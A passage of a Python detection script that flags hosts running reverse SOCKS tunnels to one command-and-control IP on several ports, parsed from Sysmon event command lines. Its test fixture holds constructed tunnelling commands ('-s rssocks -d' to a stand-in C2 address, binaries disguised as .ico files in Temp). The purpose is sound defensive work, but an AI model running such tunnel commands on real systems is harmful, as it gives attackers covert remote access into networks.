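    for ev in events:
        info = parse_tunnel_cmdline(ev["cmdline"])
        if info and info["c2_ip"] and info["c2_port"]:
            key = (ev["host"], info["c2_ip"])
            ports[key].add(info["c2_port"])
            images[key].add(ev["image"])
    return [
        {"host": h, "c2_ip": ip, "ports": sorted(p), "images": sorted(images[(h, ip)])}
        for (h, ip), p in sorted(ports.items()) if len(p) >= min_ports
    ]


def sample_events():
    """Constructed Sysmon Event 1 records for one host running several tunnels."""
    c2 = "203.0.113.10"   # documentation address standing in for a C2 IP
    return [
        {"host": "SRV-WEB01", "image": "C:\\Windows\\Temp\\v.ico",
         "cmdline": f"C:\\Windows\\Temp\\v.ico -s rssocks -d {c2} -e 443"},
        {"host": "SRV-WEB01", "image": "C:\\Windows\\Temp\\eir.ico",
         "cmdline": f"C:\\Windows\\Temp\\eir.ico -s rssocks -d {c2} -e 1433"},
        {"host": "SRV-WEB01", "image": "C:\\Windows\\Temp\\cisos.ico",
         "cmdline": f"C:\\Windows\\Temp\\cisos.ico -s rssocks -d {c2} -e 8888"},
        # internal chaining hop: no -d, so it is parsed but not counted as C2
        {"host": "SRV-WEB01", "image": "C:\\Users\\public\\music\\aa.exe",
         "cmdline": "aa.exe -s lcx_listen -l 1080 -e 8888"},
        # unrelated process that happens to carry a -d flag: must not match
        {"host": "SRV-WEB01", "image": "C:\\Windows\\System32\\ping.exe",
         "cmdline": "ping -d 10.0.0.5"},
    ]


if __name__ == "__main__":
    for hit in redundant_tunnels(sample_events()):
        print(hit)
```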
